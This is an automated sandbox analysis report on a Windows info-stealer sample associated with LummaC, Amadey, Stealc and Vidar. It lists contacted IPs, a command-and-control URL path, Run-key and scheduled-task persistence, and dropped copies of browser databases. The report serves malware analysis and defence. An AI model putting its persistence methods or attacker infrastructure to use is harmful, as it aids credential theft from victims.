162.159.61.3	unknown	United States	13335	CLOUDFLARENETUS	false
20.110.205.119	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
172.217.16.142	plus.l.google.com	United States	15169	GOOGLEUS	false
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
4.150.155.223	unknown	United States	3356	LEVEL3US	false
20.50.73.10	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
185.215.113.206	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
23.209.72.25	unknown	United States	20940	AKAMAI-ASN1EU	false
20.1.248.118	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
108.139.47.33	unknown	United States	16509	AMAZON-02US	false
204.79.197.219	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
172.64.41.3	chrome.cloudflare-dns.com	United States	13335	CLOUDFLARENETUS	false
142.250.186.161	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false
23.44.133.12	unknown	United States	20940	AKAMAI-ASN1EU	false
18.244.18.122	sb.scorecardresearch.com	United States	16509	AMAZON-02US	false
94.245.104.56	ssl.bingadsedgeextension-prod-europe.azurewebsites.net	United Kingdom	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
23.200.0.34	unknown	United States	20940	AKAMAI-ASN1EU	false
142.250.185.174	play.google.com	United States	15169	GOOGLEUS	false
188.114.96.3	navygenerayk.store	European Union	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.5
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1553506
Start date and time:	2024-11-11 10:32:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 17s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	36
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@90/314@51/27
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.185.67, 64.233.167.84, 142.250.74.206, 34.104.35.123, 142.250.181.227, 216.58.212.170, 216.58.212.138, 142.250.186.170, 172.217.18.106, 142.250.185.106, 142.250.186.138, 142.250.186.106, 172.217.18.10, 142.250.186.42, 172.217.16.202, 142.250.181.234, 142.250.184.234, 216.58.206.42, 216.58.206.74, 172.217.23.106, 142.250.184.202, 142.250.185.234, 142.250.186.74, 142.250.185.202, 142.250.185.170, 142.250.185.138, 142.250.185.74, 204.79.197.203, 13.107.42.16, 204.79.197.239, 13.107.21.239, 142.250.181.238, 13.107.6.158, 4.231.68.226, 2.19.126.145, 2.19.126.152, 88.221.110.242, 88.221.110.195, 2.23.209.137, 2.23.209.154, 2.23.209.156, 2.23.209.143, 2.23.209.150, 2.23.209.142, 2.23.209.140, 2.23.209.144, 2.23.209.149, 2.23.209.189, 2.23.209.135, 2.23.209.193, 2.23.209.132, 2.23.209.183, 2.23.209.185, 2.23.209.133, 13.74.129.1, 13.107.21.237, 204.79.197.237, 2.23.209.16, 2.23.209.26, 2.23.209.18, 2.23.209.17, 2.23.209.27, 2.23.209.20, 2.23.209.24, 2.23.209.23, 2.23.
Excluded domains from analysis (whitelisted): nav-edge.smartscreen.microsoft.com, slscr.update.microsoft.com, a416.dscd.akamai.net, img-s-msn-com.akamaized.net, data-edge.smartscreen.microsoft.com, clientservices.googleapis.com, clients2.google.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, login.live.com, config-edge-skype.l-0007.l-msedge.net, www.gstatic.com, l-0007.l-msedge.net, e28578.d.akamaiedge.net, www.bing.com, assets.msn.com.edgekey.net, fs.microsoft.com, bingadsedgeextension-prod.trafficmanager.net, c-bing-com.dual-a-0034.a-msedge.net, ogads-pa.googleapis.com, prod-atm-wds-edge.trafficmanager.net, www-www.bing.com.trafficmanager.net, business-bing-com.b-0005.b-msedge.net, a1834.dscg2.akamai.net, prod-agic-we-8.westeurope.cloudapp.azure.com, edgedl.me.gvt1.com, c.bing.com, clients.l.google.com, config.edge.skype.com.trafficmanager.net, c-msn-com-nsatc.trafficmanager.net, www.bing.com.edgekey.net, th.bing.com, msedge.b.tlu.dl.delivery.mp.microsoft.com, config.edge.skype.com, optimizationguide-pa
HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtWriteFile calls found.
Report size getting too big, too many NtWriteVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
04:33:28	API Interceptor	15x Sleep call for process: file.exe modified
04:34:01	API Interceptor	25162x Sleep call for process: skotes.exe modified
04:34:09	API Interceptor	32x Sleep call for process: 167c7bdf2f.exe modified
10:33:33	Task Scheduler	Run new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
10:34:13	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 167c7bdf2f.exe C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe
10:34:22	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run d77e539f5f.exe C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe
10:34:30	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 85c9ba9a2d.exe C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe
10:34:38	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 167c7bdf2f.exe C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe
10:34:46	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run d77e539f5f.exe C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe
10:34:54	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 85c9ba9a2d.exe C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.43	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
13.107.246.40	Payment Transfer Receipt.shtml	Get hash	malicious	HTMLPhisher	Browse	www.aib.gov.uk/
	NEW ORDER.xls	Get hash	malicious	Unknown	Browse	2s.gg/3zs
	PO_OCF 408.xls	Get hash	malicious	Unknown	Browse	2s.gg/42Q
	06836722_218 Aluplast.docx.doc	Get hash	malicious	Unknown	Browse	2s.gg/3zk
	Quotation.xls	Get hash	malicious	Unknown	Browse	2s.gg/3zM

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
sb.scorecardresearch.com	rPO3799039985.exe	Get hash	malicious	Remcos, GuLoader	Browse	3.163.101.92
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	52.222.169.76
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	18.244.18.122
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	18.244.18.122
	A3W2CpXxiO.exe	Get hash	malicious	Stealc, Vidar	Browse	18.245.60.72
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	18.244.18.38
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	18.244.18.27
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	18.154.84.35
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	18.245.60.72
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	18.244.18.32
chrome.cloudflare-dns.com	SAFAIR - MDE_File_Sample_c4fda6eee21550785a1c89ce291a2d3072e0ed9b.zip	Get hash	malicious	Unknown	Browse	162.159.61.3
	rPO3799039985.exe	Get hash	malicious	Remcos, GuLoader	Browse	172.64.41.3
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	162.159.61.3
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	172.64.41.3
	A3W2CpXxiO.exe	Get hash	malicious	Stealc, Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	162.159.61.3
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	162.159.61.3
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.64.41.3
	https://qrco.de/bfYBpc	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	172.64.41.3
ssl.bingadsedgeextension-prod-europe.azurewebsites.net	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	94.245.104.56
	A3W2CpXxiO.exe	Get hash	malicious	Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	94.245.104.56

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AKAMAI-ASN1EU	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	23.198.7.176
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	23.198.7.187
	sora.mpsl.elf	Get hash	malicious	Mirai	Browse	96.7.249.154
	sora.m68k.elf	Get hash	malicious	Mirai	Browse	23.63.70.84
	yakuza.arm4.elf	Get hash	malicious	Unknown	Browse	104.124.61.159
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	23.198.7.177
	A3W2CpXxiO.exe	Get hash	malicious	Stealc, Vidar	Browse	23.198.7.173
	Setup.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse	23.197.127.21
	QkBj8CevLU.exe	Get hash	malicious	Stealc, Vidar	Browse	23.197.127.21
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	23.221.22.219
AKAMAI-ASN1EU	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	23.198.7.176
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	23.198.7.187
	sora.mpsl.elf	Get hash	malicious	Mirai	Browse	96.7.249.154
	sora.m68k.elf	Get hash	malicious	Mirai	Browse	23.63.70.84
	yakuza.arm4.elf	Get hash	malicious	Unknown	Browse	104.124.61.159
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	23.198.7.177
	A3W2CpXxiO.exe	Get hash	malicious	Stealc, Vidar	Browse	23.198.7.173
	Setup.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse	23.197.127.21
	QkBj8CevLU.exe	Get hash	malicious	Stealc, Vidar	Browse	23.197.127.21
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	23.221.22.219
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	LummaC, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	185.215.113.16
MICROSOFT-CORP-MSN-AS-BLOCKUS	SAFAIR - MDE_File_Sample_c4fda6eee21550785a1c89ce291a2d3072e0ed9b.zip	Get hash	malicious	Unknown	Browse	13.107.42.16
	GE AEROSPACE _WIRE REMITTANCE.xlsx	Get hash	malicious	Unknown	Browse	20.190.159.0
	Sampension-file-846845087.pdf	Get hash	malicious	Captcha Phish	Browse	150.171.28.10
	rPO3799039985.exe	Get hash	malicious	Remcos, GuLoader	Browse	52.123.251.14
	bin.sh.elf	Get hash	malicious	Mirai	Browse	40.67.83.151
	https://parkonking.us15.list-manage.com/track/click?u=ad047aa5468a45d38c75e108c&id=88101fd354&e=1659a0a55d	Get hash	malicious	Unknown	Browse	150.171.27.10
	https://anzsupportus.web.app/#	Get hash	malicious	Unknown	Browse	150.171.27.10
	https://hobitronik.com/	Get hash	malicious	Unknown	Browse	40.127.152.155
	maryanne@propertynz.co.nz_Agreement70554.xlsx	Get hash	malicious	Unknown	Browse	13.69.116.108
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	94.245.104.56

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	http://222.71.142.26:8081/LoginPage.aspx	Get hash	malicious	Unknown	Browse	4.245.163.56 184.28.90.27 40.126.31.69 13.107.246.45
	Sampension-file-846845087.pdf	Get hash	malicious	Captcha Phish	Browse	4.245.163.56 184.28.90.27 40.126.31.69 13.107.246.45
	https://zapp-p.com/qouta/#test@test.com	Get hash	malicious	Unknown	Browse	4.245.163.56 184.28.90.27 40.126.31.69 13.107.246.45
	rPO3799039985.exe	Get hash	malicious	Remcos, GuLoader	Browse	4.245.163.56 184.28.90.27 40.126.31.69 13.107.246.45
	THE COSTS INCURRED PENDING (1).pdf	Get hash	malicious	Unknown	Browse	4.245.163.56 184.28.90.27 40.126.31.69 13.107.246.45
	https://t.salesmatemail.net/email/v1/track?key=0db79d05-9af0-414c-bfc4-998c239faf2b	Get hash	malicious	Unknown	Browse	4.245.163.56 184.28.90.27 40.126.31.69 13.107.246.45
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	4.245.163.56 184.28.90.27 40.126.31.69 13.107.246.45
	Complete_with_DocuSign_49584.pdf	Get hash	malicious	HTMLPhisher	Browse	4.245.163.56 184.28.90.27 40.126.31.69 13.107.246.45
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	4.245.163.56 184.28.90.27 40.126.31.69 13.107.246.45
	https://parkonking.us15.list-manage.com/track/click?u=ad047aa5468a45d38c75e108c&id=88101fd354&e=1659a0a55d	Get hash	malicious	Unknown	Browse	4.245.163.56 184.28.90.27 40.126.31.69 13.107.246.45
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Scan112024.vbs	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Consulta de encomenda N#U00ba TM06-Q2-11-24.vbs	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Stealc	Browse	188.114.96.3
	we5SGOAe69.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Stealc	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	188.114.96.3

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	Xg0OdI1VqO.exe	Get hash	malicious	Stealc, Vidar	Browse
C:\ProgramData\mozglue.dll	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse
	Xg0OdI1VqO.exe	Get hash	malicious	Stealc, Vidar	Browse

Created / dropped Files

C:\ProgramData\BKFBAKFCBFHIJJJJDBFC

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1743), with CRLF line terminators
Category:	dropped
Size (bytes):	9504
Entropy (8bit):	5.512408163813622
Encrypted:	false
SSDEEP:	192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
MD5:	1191AEB8EAFD5B2D5C29DF9B62C45278
SHA1:	584A8B78810AEE6008839EF3F1AC21FD5435B990
SHA-256:	0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
SHA-512:	86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\DBKKFHIE

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.265079564165095
Encrypted:	false
SSDEEP:	384:8/2qOB1nxCkMNSAELyKOMq+8yC8F/YfU5m+OlTLVume:Bq+n0JN9ELyKOMq+8y9/OwF
MD5:	F002D56A8943FD58154C6A16C483FF6D
SHA1:	DF276B713CFD350453C5079E37FB3F145658A427
SHA-256:	C8F3D3E5440FFA2216E68FBF08CB9E13905402F9321EA3D9CDB1CAE24E0E64D4
SHA-512:	B46C79180D7383A03AECFF23D7DA3E682F38E8E701B382D769798D3C0EFBEEE32B691774ECE7FDDF08DCC2011056C86C5DED4F4C2B1932B7412BED2B40639D4C
Malicious:	false
Preview:	SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EBKKKEGIDBGHIDGDHDBFHDAKJJ

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03859996294213402
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
MD5:	D2A38A463B7925FE3ABE31ECCCE66ACA
SHA1:	A1824888F9E086439B287DEA497F660F3AA4B397
SHA-256:	474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
SHA-512:	62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HIDAFHDH

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HIJJEGDBFIIDGCAKJEBK

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IDHIEBAAKJDHIECAAFHC

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JEGHCBAFBFHIIECBKFCGIEBFBK

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
